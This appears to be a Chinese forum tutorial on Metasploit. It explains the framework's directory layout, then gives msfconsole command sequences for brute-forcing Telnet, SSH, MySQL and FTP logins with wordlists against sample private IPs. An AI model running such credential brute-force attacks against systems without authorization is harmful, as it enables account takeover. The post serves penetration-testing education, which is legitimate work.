Metasploit 目录结构
### Metasploit 目录结构目录地址:`/usr/share/metasploit-framework/`
最重要的目录是 `data`,`modules`,`scripts`,`tools`,`plugins`
![主目录结构](data/attachment/forum/202010/22/000032szjnlillnbobnlmn.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "主目录")
### data 目录
存放 `meterpreter`,`exploits`,`wordlists` 等。
![](data/attachment/forum/202010/22/000244hka0p8gikz3k8j8g.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "22.png")
**meterpreter** 是 msf 的测试载荷,使用于后渗透阶段
**exploits** 里面则存放了许多的 cve 漏洞利用代码
**wordlists** 里面放的是字典文件
### modules 目录
`metasploit` 的核心目录了,存放着各个测试模块。用于完成测试。
### scirpts 目录
存放一些 msf 用到的脚本文件,如 `meterpreter`,`ps`,`resource`,`shell`等常见的脚本。
### tools 目录
存放各种可使用的工具
### plugins 目录
存放 msf 的各种插件
## Metasploit 爆破篇
#### 爆破 TELNET
```
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.1.1 #目标ip
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
run
```
### 爆破 SSH
```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
set THREADS 50
run
```
### 爆破 MySQL
**ps**需目标主机开启`3306`端口和远程登录账号
```
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.101
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
run
```
### 爆破 FTP
```
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止
set VERBOSE true #打印输出
set USERNAME admin # frp账号
set PASS_FILE /root/Desktop/password.txt
run
```
页:
[1]